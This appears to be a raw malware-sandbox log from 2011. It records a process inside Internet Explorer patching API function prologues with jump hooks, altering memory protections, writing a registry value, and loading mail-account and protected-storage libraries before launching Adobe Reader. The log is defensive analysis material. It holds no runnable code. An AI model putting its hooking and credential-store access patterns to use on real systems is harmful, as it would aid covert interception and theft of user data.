Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771F9100 Length: 30 Value: 8B FF 55 8B EC 83 EC 20 53 56 33 C0 57 33 FF 40 39 3D 8C B8 23 77 89 7D FC 89 7D F8 89 45 success or wait 2658075615
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 8190050 Length: 10 Value: 8B FF 55 8B EC E9 AB 90 06 6F success or wait 2658076601
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771F9100 Length: 5 Value: E9 34 EC E0 90 success or wait 2658077540
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771F9100 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2658077862
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771D89F7 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2658079711
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771D89F7 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D 8C B8 23 77 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 2658080133
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 819005A Length: 10 Value: 8B FF 55 8B EC E9 98 89 04 6F success or wait 2658081123
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771D89F7 Length: 5 Value: E9 8B F3 E2 90 success or wait 2658082063
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771D89F7 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2658082383
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C79C2 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2658084440
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C79C2 Length: 30 Value: 6A 2C 68 10 7B 1C 77 E8 A7 9C FE FF 33 DB 89 5D DC 89 5D E4 39 1D 8C B8 23 77 0F 84 E8 95 success or wait 2658084945
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 8190064 Length: 12 Value: 6A 2C 68 10 7B 1C 77 E9 59 79 03 6F success or wait 2658085940
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C79C2 Length: 5 Value: E9 F0 03 E4 90 success or wait 2658087099
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C79C2 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2658088314
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771F9C53 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2658104328
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771F9C53 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 0C FF 75 08 E8 1A F4 FD FF 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 2658104633
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 8190070 Length: 10 Value: 8B FF 55 8B EC E9 DE 9B 06 6F success or wait 2658105622
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771F9C53 Length: 5 Value: E9 B4 E1 E0 90 success or wait 2658106557
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771F9C53 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2658106824
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771D9064 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2658108673
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771D9064 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 2658109094
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 819007A Length: 10 Value: 8B FF 55 8B EC E9 E5 8F 04 6F success or wait 2658110073
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771D9064 Length: 5 Value: E9 BB ED E2 90 success or wait 2658111071
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771D9064 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2658111392
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771BB1D8 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2658113515
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771BB1D8 Length: 30 Value: 8B FF 55 8B EC 83 EC 48 53 8B 5D 10 56 33 F6 39 75 14 57 8B 7D 0C C7 45 F4 01 00 00 00 89 success or wait 2658113943
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 8190084 Length: 10 Value: 8B FF 55 8B EC E9 4F B1 02 6F success or wait 2658114973
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771BB1D8 Length: 5 Value: E9 5F CC E4 90 success or wait 2658115972
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771BB1D8 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2658116302
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 71AB3E2B Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2658117018
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 71AB3E2B Length: 30 Value: 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 2658117485
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 819008E Length: 10 Value: 8B FF 55 8B EC E9 98 3D 92 69 success or wait 2658118459
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 71AB3E2B Length: 5 Value: E9 3E E9 55 96 success or wait 2658119485
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 71AB3E2B Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2658119825
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 71AB4C27 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 2658120959
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 71AB68FA Length: 30 Value: 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 2658125122
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 71AB676F Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 5E 4A 00 00 8D 45 success or wait 2658128418
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 71AB4CB5 Length: 30 Value: 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 80 65 00 00 8D 45 F8 50 E8 DD success or wait 2658131540
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7E41ECA3 Length: 30 Value: B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 2658136287
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7E41FE6E Length: 30 Value: B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 2658141078
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7E428D20 Length: 30 Value: 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2658145698
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7E42C17E Length: 30 Value: 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2658151122
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7E423D3A Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2658155839
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7E43E577 Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2658160717
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7E430833 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 2658179359
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7E44F965 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 2658183223
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7E430A47 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 2658187618
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7E44F9B4 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 2658193892
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7E42A01E Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 2658198631
System info queried Type: ProcessInformation success or wait 2658636727
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 82A0000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2658643940
Thread created PID: 1712 TID: 1276 EIP: 7C8106F9 Imagepath: C:\Program Files\Internet Explorer\iexplore.exe Injected: false success or wait 2658814525
Mutant created Name: \BaseNamedObjects\Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44} object name exists 2658822872
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 15807505 success or wait 2664235762
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 15807505 success or wait 2664236292
Section loaded Path: C:\WINDOWS\system32\msoeacct.dll Access: write and read and execute Type: commit Baseaddress: 82A0000 Size: 253952 Protection: execute Mapped to pid: own pid success or wait 2664252890
Section loaded Path: C:\WINDOWS\system32\msoeacct.dll Access: write and read and execute Type: commit Baseaddress: 82A0000 Size: 253952 Protection: execute Mapped to pid: own pid success or wait 2664255575
Section loaded Path: C:\WINDOWS\system32\msoeacct.dll Access: query and write and read and execute Type: image Baseaddress: 68810000 Size: 270336 Protection: read write Mapped to pid: own pid success or wait 2664258253
Section loaded Path: \KnownDlls\MSOERT2.dll Access: write and read and execute Type: unknown Baseaddress: 68810000 Size: 270336 Protection: read write Mapped to pid: own pid object name not found 2664259872
Section loaded Path: C:\WINDOWS\system32\msoert2.dll Access: query and write and read and execute Type: image Baseaddress: 76880000 Size: 139264 Protection: read write Mapped to pid: own pid success or wait 2664261702
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 82B0000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2664296511
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 82B0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2664299832
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 82B0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2664356735
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 82D0000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2664396539
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 82D0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2664401346
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 82D0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2664469027
Section loaded Path: C:\WINDOWS\system32\acctres.dll Access: write and read and execute Type: commit Baseaddress: 82D0000 Size: 65536 Protection: execute Mapped to pid: own pid success or wait 2664569223
Section loaded Path: C:\WINDOWS\system32\acctres.dll Access: write and read and execute Type: commit Baseaddress: 82D0000 Size: 65536 Protection: execute Mapped to pid: own pid success or wait 2664572438
Section loaded Path: C:\WINDOWS\system32\acctres.dll Access: query and write and read and execute Type: image Baseaddress: 71780000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2664578077
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Account Manager\Accounts Name: NULL success or wait 2664674516
Section loaded Path: C:\Program Files\Common Files\System\wab32.dll Access: write and read and execute Type: commit Baseaddress: 82F0000 Size: 512000 Protection: execute Mapped to pid: own pid success or wait 2664676568
Section loaded Path: C:\Program Files\Common Files\System\wab32.dll Access: write and read and execute Type: commit Baseaddress: 82F0000 Size: 512000 Protection: execute Mapped to pid: own pid success or wait 2664678291
Section loaded Path: C:\Program Files\Common Files\System\wab32.dll Access: query and write and read and execute Type: image Baseaddress: 470D0000 Size: 528384 Protection: read write Mapped to pid: own pid success or wait 2664680537
Section loaded Path: C:\Program Files\Common Files\System\wab32res.dll Access: write and read and execute Type: commit Baseaddress: 82F0000 Size: 249856 Protection: execute Mapped to pid: own pid success or wait 2664695031
Section loaded Path: C:\Program Files\Common Files\System\wab32res.dll Access: write and read and execute Type: commit Baseaddress: 82F0000 Size: 249856 Protection: execute Mapped to pid: own pid success or wait 2664744913
Section loaded Path: C:\Program Files\Common Files\System\wab32res.dll Access: query and write and read and execute Type: image Baseaddress: 35F40000 Size: 258048 Protection: read write Mapped to pid: own pid success or wait 2664747530
System info queried Type: ProcessInformation success or wait 2665232559
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 82D0000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2665241340
Thread created PID: 1712 TID: 2128 EIP: 7C8106F9 Imagepath: C:\Program Files\Internet Explorer\iexplore.exe Injected: false success or wait 2665463772
Section loaded Path: C:\WINDOWS\system32\msident.dll Access: write and read and execute Type: commit Baseaddress: 82D0000 Size: 53248 Protection: execute Mapped to pid: own pid success or wait 2666078147
Section loaded Path: C:\WINDOWS\system32\msident.dll Access: write and read and execute Type: commit Baseaddress: 82D0000 Size: 53248 Protection: execute Mapped to pid: own pid success or wait 2666162476
Section loaded Path: C:\WINDOWS\system32\msident.dll Access: query and write and read and execute Type: image Baseaddress: 608A0000 Size: 61440 Protection: read write Mapped to pid: own pid success or wait 2666165344
Section loaded Path: C:\WINDOWS\system32\msident.dll Access: read Type: commit Baseaddress: 82D0000 Size: 53248 Protection: readonly Mapped to pid: own pid success or wait 2666189840
Section loaded Path: C:\WINDOWS\system32\msidntld.dll Access: write and read and execute Type: commit Baseaddress: 82D0000 Size: 16384 Protection: execute Mapped to pid: own pid success or wait 2666244399
Section loaded Path: C:\WINDOWS\system32\msidntld.dll Access: write and read and execute Type: commit Baseaddress: 82D0000 Size: 16384 Protection: execute Mapped to pid: own pid success or wait 2666316383
Section loaded Path: C:\WINDOWS\system32\msidntld.dll Access: query and write and read and execute Type: image Baseaddress: 60890000 Size: 24576 Protection: read write Mapped to pid: own pid success or wait 2666319835
Section loaded Path: \KnownDlls\PSTOREC.DLL Access: write and read and execute Type: unknown Baseaddress: 60890000 Size: 24576 Protection: read write Mapped to pid: own pid object name not found 2666346256
Section loaded Path: C:\WINDOWS\system32\pstorec.dll Access: query and write and read and execute Type: image Baseaddress: 5E0C0000 Size: 53248 Protection: read write Mapped to pid: own pid success or wait 2666353363
Section loaded Path: \KnownDlls\ATL.DLL Access: write and read and execute Type: unknown Baseaddress: 5E0C0000 Size: 53248 Protection: read write Mapped to pid: own pid object name not found 2666535268
Section loaded Path: C:\WINDOWS\system32\atl.dll Access: query and write and read and execute Type: image Baseaddress: 76B20000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2666538153
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 4FC HWNDs: 5029c, 801d6, 1, 901aa, 5015c, 50174, 5015e, 3016e, 1, 5c726f74, 6c707041, 74616369, 206e6f69, 61746144, 796b535c success or wait 2666847620
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 4FC HWNDs: 5029c, 801d6, 1, 901aa, 5015c, 50174, 5015e, 3016e, 1, 5c726f74, 6c707041, 74616369, 206e6f69, 61746144, 796b535c success or wait 2666848580
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 4FC HWNDs: 5029c, 801d6, 1, 901aa, 5015c, 50174, 5015e, 3016e, 1, 5c726f74, 6c707041, 74616369, 206e6f69, 61746144, 796b535c success or wait 2666849145
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 4FC HWNDs: 5029c, 801d6, 1, 901aa, 5015c, 50174, 5015e, 3016e, 1, 5c726f74, 6c707041, 74616369, 206e6f69, 61746144, 796b535c success or wait 2666849707
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 4FC HWNDs: 5029c, 1, 530049, 520054, 5c0059, 530055, 520045, 53005c, 31002d, 35002d, 32002d, 2d0031, 300035, 390037, 310032 success or wait 2666850339
Key value replaced with new Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 15807505 Type: Dword Data: -1521036924 Old data: -1521036860 success or wait 2666897423
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6C8 HWNDs: 50122, 400c0, 30132, 30130, 30166, 60176, 30116, 400e0, 5013a, 40134, 60104, 30146, 50102, 700f8, 900fe success or wait 2819802544
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6C8 HWNDs: 50122, 400c0, 30132, 30130, 30166, 60176, 30116, 400e0, 5013a, 40134, 60104, 30146, 50102, 700f8, 900fe success or wait 2819807509
System info queried Type: ProcessInformation success or wait 2821406742
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: C40000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2821427633
Thread created PID: 1712 TID: 2736 EIP: 7C8106F9 Imagepath: C:\Program Files\Internet Explorer\iexplore.exe Injected: false success or wait 2821893969
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 1CC HWNDs: 3011a, 30114, 1, 30166, 60176, 30116, 400e0, 40134, 60104, 30146, 700f8, 900fe, 90112, 60108, 1 success or wait 2826653577
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 1CC HWNDs: 3011a, 30114, 1, 30166, 60176, 30116, 400e0, 40134, 60104, 30146, 700f8, 900fe, 90112, 60108, 1 success or wait 2827004328
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 1CC HWNDs: 3011a, 30114, 1, 30166, 60176, 30116, 400e0, 40134, 60104, 30146, 700f8, 900fe, 90112, 60108, 1 success or wait 2827034747
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6C8 HWNDs: 400c0, 30166, 60176, 30116, 400e0, 40134, 60104, 30146, 700f8, 900fe, 90112, 60108, 1, 60108, 1 success or wait 2827425689
Section loaded Path: \BaseNamedObjects\ASMWIN0 Access: query and write and read Type: commit Baseaddress: C40000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2827483315
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6C8 HWNDs: 400c0, 30166, 60176, 30116, 400e0, 40134, 60104, 30146, 700f8, 900fe, 90112, 60108, 1, 60108, 1 success or wait 2827556750
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6C8 HWNDs: 400c0, 30166, 60176, 30116, 400e0, 40134, 60104, 30146, 700f8, 900fe, 90112, 60108, 1, 60108, 1 success or wait 2827695066
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6C8 HWNDs: 400c0, 30166, 60176, 30116, 400e0, 40134, 60104, 30146, 700f8, 900fe, 90112, 60108, 1, 60108, 1 success or wait 2827892392
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6C8 HWNDs: 400c0, 30166, 60176, 30116, 400e0, 40134, 60104, 30146, 700f8, 900fe, 90112, 60108, 1, 60108, 1 success or wait 2827923383
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6C8 HWNDs: 400c0, 30166, 60176, 30116, 400e0, 40134, 60104, 30146, 700f8, 900fe, 90112, 60108, 1, 60108, 1 success or wait 2827925369
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6C8 HWNDs: 400e0, 40134, 60104, 30146, 700f8, 900fe, 90112, 60108, 1, 2eba, 0, 57005c, 4e0049, 4f0044, 1 success or wait 2828866297
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6C8 HWNDs: 400e0, 40134, 60104, 30146, 700f8, 900fe, 90112, 60108, 1, 2eba, 0, 57005c, 4e0049, 4f0044, 1 success or wait 2828868316
System info queried Type: ProcessInformation success or wait 2830171013
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: CB0000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2830187401
Thread created PID: 1712 TID: 2812 EIP: 7C8106F9 Imagepath: C:\Program Files\Internet Explorer\iexplore.exe Injected: false success or wait 2830484181
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6C8 HWNDs: 40134, 30146, 90112, 60108, 1, 1, 1, 60108, 1, 2eba, 0, 57005c, 4e0049, 4f0044, 1 success or wait 2831672320
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6C8 HWNDs: 40134, 30146, 90112, 60108, 1, 1, 1, 60108, 1, 2eba, 0, 57005c, 4e0049, 4f0044, 1 success or wait 2831675804
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6C8 HWNDs: 40134, 30146, 90112, 60108, 1, 1, 1, 60108, 1, 2eba, 0, 57005c, 4e0049, 4f0044, 1 success or wait 2831678051
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6C8 HWNDs: 40134, 30146, 90112, 60108, 1, 1, 1, 60108, 1, 2eba, 0, 57005c, 4e0049, 4f0044, 1 success or wait 2831679215
Analysis File: AcroRd32.exe PID: 1732 Parent PID: 1712
+ Sections
+ General
Start time: 05:44:06
Start date: 08/12/2011
Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe
Commandline: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe /o /eo /l /b /w 393476
Imagebase: 0x400000
File size: 341616 bytes
MD5 hash: 80660C611B596FFE8AF4074B31AA6FB7
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat read attributes and synchronize and generic read and generic write synchronous io non alert and non directory file and random access false success or wait 2 2FC013C
C:\Documents and Settings\Administrator\Cookies\index.dat read attributes and synchronize and generic read and generic write synchronous io non alert and non directory file and random access false success or wait 2 2FC013C
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat read attributes and synchronize and generic read and generic write synchronous io non alert and non directory file and random access false success or wait 2 2FC013C
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\J5ROTG8O\w[1].htm read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 2 2FC013C
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\ZLL6TAVD\w[1].htm read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 2 2FC013C
C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi.dat read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 5FDA4FF
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 280000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 2A0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2F0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 340000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown 340000 24576 own pid readonly object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown 340000 24576 own pid readonly object name not found 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.3053_x-ww_b80fa8ca\msvcp80.dll query and write and read and execute image 7C420000 552960 own pid read write success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.3053_x-ww_b80fa8ca\msvcr80.dll query and write and read and execute image 78130000 634880 own pid read write success or wait 1
\KnownDlls\ShimEng.dll write and read and execute unknown 78130000 634880 own pid read write object name not found 1
C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 460000 1208320 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\aclayers.dll write and read and execute commit 360000 475136 own pid execute success or wait 1
C:\WINDOWS\AppPatch\aclayers.dll write and read and execute commit 360000 475136 own pid execute success or wait 1
C:\WINDOWS\AppPatch\aclayers.dll query and write and read and execute image 71590000 495616 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\WINSPOOL.DRV write and read and execute unknown 769C0000 737280 own pid read write object name not found 1
C:\WINDOWS\system32\winspool.drv query and write and read and execute image 73000000 155648 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 370000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 3C0000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 3C0000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 940000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 940000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 3F0000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 3F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 3F0000 4096 own pid readonly success or wait 1
\KnownDlls\AcroRd32.dll write and read and execute unknown 3F0000 4096 own pid readonly object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.dll query and write and read and execute image 960000 14249984 own pid read write conflicting addresses 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\AGM.dll write and read and execute unknown 77C00000 32768 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\AGM.dll query and write and read and execute image 6000000 4939776 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\CoolType.dll write and read and execute unknown 77120000 569344 own pid read write object name not found 1
